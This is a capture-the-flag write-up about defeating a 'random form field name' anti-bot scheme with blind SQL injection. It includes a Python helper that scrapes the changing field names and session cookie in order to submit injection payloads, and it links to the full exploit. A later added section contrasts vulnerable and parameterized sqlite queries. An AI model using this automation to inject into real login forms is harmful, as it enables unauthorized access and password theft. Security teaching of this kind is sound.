Task description
The site looks like it's trying to sell some security mechanism they came up with (patent pending, heh). The idea is that form fields get random names, so bots can't access the site. There is a sample application, where we can log in with "test / test" to check how their super secure solution works.
There is an HTML comment in the login form.
<!--<h3>For admin interface, admin / ???????</h3>-->
Of course randomizing names of a form won't protect you from SQL injection. This is what we get after logging in as admin:
What is left is getting the password with blind SQL injection. Let's see if we can use bots after all. This is the code that bypasses the random names and logs in with a specified username:
import requests

url = "http://54.204.80.192"

def login_as(payload):
    # Fetch the login form; the field names are different on every request.
    resp = requests.get(url + "/example")
    form = resp.text  # already text; no .encode() needed, which keeps the str splits working on Python 3
    # Pull the form action and the current random names of the two inputs straight out of the HTML.
    action = form.split("<form action=\"")[1].split("\"")[0]
    user = form.split("Username")[1].split("Password")[0].split("name=\"")[1].split("\"")[0]
    passwd = form.split("Password")[1].split("primary")[0].split("name=\"")[1].split("\"")[0]
    # The random names are tied to the session cookie, so send it back with the POST.
    cookie = resp.headers['set-cookie']
    resp = requests.post(url + action, data={user: payload, passwd: "test"}, headers={'Cookie': cookie})
    return resp.text
Now we can plug this into our blind injection script, and it will spit out the table name, column name and eventually the password. Here is the final exploit: https://gist.github.com/balidani/e541f5ff39f6f3d41156
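To make the point from the other side: the problem is how the server builds its query, not what the form fields are called. The following is an added illustration, not the CTF site's code (its backend is never shown); it assumes a tiny sqlite3 login where the randomized field names are mapped back to their logical names before the query runs, and contrasts the string-spliced query with a parameterized one.

```python
import sqlite3

# Constructed stand-in for the CTF site's login backend (assumption: the real
# backend is not on the page). Randomized form names are resolved server-side
# to "username"/"password" before the query runs, so they never touch the SQL.

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Constructed sample rows; the admin password is a placeholder.
    conn.execute("INSERT INTO users VALUES ('test', 'test'), ('admin', 'placeholder-secret')")
    return conn

def resolve_fields(form, field_map):
    """Map randomized field names (e.g. {'fld_7a1c': 'username'}) back to logical names."""
    return {field_map[k]: v for k, v in form.items() if k in field_map}

def login_unsafe(conn, form, field_map):
    creds = resolve_fields(form, field_map)
    # Vulnerable: user input is spliced into the SQL text itself.
    sql = "SELECT 1 FROM users WHERE username = '%s' AND password = '%s'" % (
        creds["username"], creds["password"])
    return conn.execute(sql).fetchone() is not None

def login_safe(conn, form, field_map):
    creds = resolve_fields(form, field_map)
    # Fixed: placeholders keep the input as data, whatever the form fields were named.
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (creds["username"], creds["password"])).fetchone() is not None

def probe(login_fn, username):
    """Return 'ok'/'denied' for a normal answer, or 'sql-error' when the query text broke.
    That third outcome is the per-request signal a blind injection keys on."""
    conn = make_db()
    field_map = {"fld_7a1c": "username", "fld_3e9b": "password"}  # constructed random names
    form = {"fld_7a1c": username, "fld_3e9b": "test"}
    try:
        return "ok" if login_fn(conn, form, field_map) else "denied"
    except sqlite3.OperationalError:
        return "sql-error"
```

A username containing a single quote changes the unsafe query's structure and produces an error, while the parameterized version simply finds no such user.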
And the flag was n0b0t5_C4n_bYpa5s_p0lYm0rph1Sm
Oh, but they can!
Awesome CTF from PPP, thanks for organizing it, I need to catch up on some work and sleep now.